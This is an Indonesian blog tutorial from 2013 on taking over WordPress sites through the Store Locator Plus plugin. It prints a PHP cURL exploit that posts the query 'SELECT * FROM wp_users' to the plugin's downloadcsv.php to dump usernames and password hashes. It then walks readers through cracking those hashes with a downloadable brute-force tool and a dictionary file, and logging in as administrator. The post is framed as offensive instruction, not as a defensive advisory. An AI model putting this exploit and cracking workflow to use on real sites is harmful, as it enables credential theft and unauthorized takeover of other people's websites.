Breaking News
Loading...
Wednesday, March 27, 2013

Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan Blind SQL Injection

4:05 AM
Pada tutorial saat ini penulis akan membahas tentang cara Hacking password login wordpress yang menggunakan Plugins – Google Maps via Store Locator Plus dengan memanfaatkan celah Blind SQL Injection.
Plugin ini didasarkan dari situs penyedianya di http://wordpress.org/extend/plugins/store-locator-le/, fiturnya sebagai berikut :

    You can use it for a variety of countries, as supported by Google Maps.
    The Store Pages add-on allows you to connect each of your locations with a WordPress page — so you can add hours, images and more!
    Supports international languages and character sets.
    Allows you to use unique map icons or your own custom map icons.
    Change default map settings via the admin panel including:
    Map type (terrain, satellite, street, etc.)
    Inset map show/hide
    Starting zoom level
    You can use miles or kilometers
    Pulldown list of cities and/or countries on search form can be toggled on/off.
    Bulk upload your locations via the CSV loader.
    Location search tracking and reporting, find out what your visitors are looking for.
    Popup email form.

Plugin ini cukup populer, berikut ratingnya.


Penulis menggunakan exploit yang dibuat oleh Sammy FORGIT – sam at opensyscom dot fr -http://www.opensyscom.fr.
Sebagai berikut exploitnya :

<?php
$ch =
curl_init(“http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array(‘query’=>”SELECT * FROM wp_users”,
     ‘filename’=>’test’,
     ‘all’=>’true’));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>

Simpan source code tersebut dengan ekstensi php ke 1 folder dengan program php.exe dari webserver apache. Disini penulis menyimpannya dengan nama wppasnow.php.

Untuk melakukan exploitasinya sebagai berikut :


Username dan password dalam bentuk hash sudah didapat, tinggal kita pecahkan password tersebut dengan WordPress PasswordHash Attack Tool yang dapat di download di http://dl.packetstormsecurity.net/Crackers/wp-hash.txt, untuk dictionary filenya dapat membuat sendiri atau dicari disitus-situs hacking.

Penulis langsung saja mencoba, ganti nilai varibel $hasP sebelumnya dengan password wordpress dalam bentuk hash yang kita dapat dari exploit yang telah dilakukan. Ganti juga nama file dictionary untuk brute dengan file dictionary milik anda.

Untuk di tempat penulis sebagai berikut :


Setelah itu tinggal di simpan lalu dijalankan seperti berikut :


Binggo, password telah didapat. Setelah password di temukan maka tinggal login admin wordpress untuk masuk ke halaman admin wordpress.

sumber: Xcode

0 comments:

Post a Comment

Ads

Friends Blog

Musik

Cari Artikel Blog

 
Toggle Footer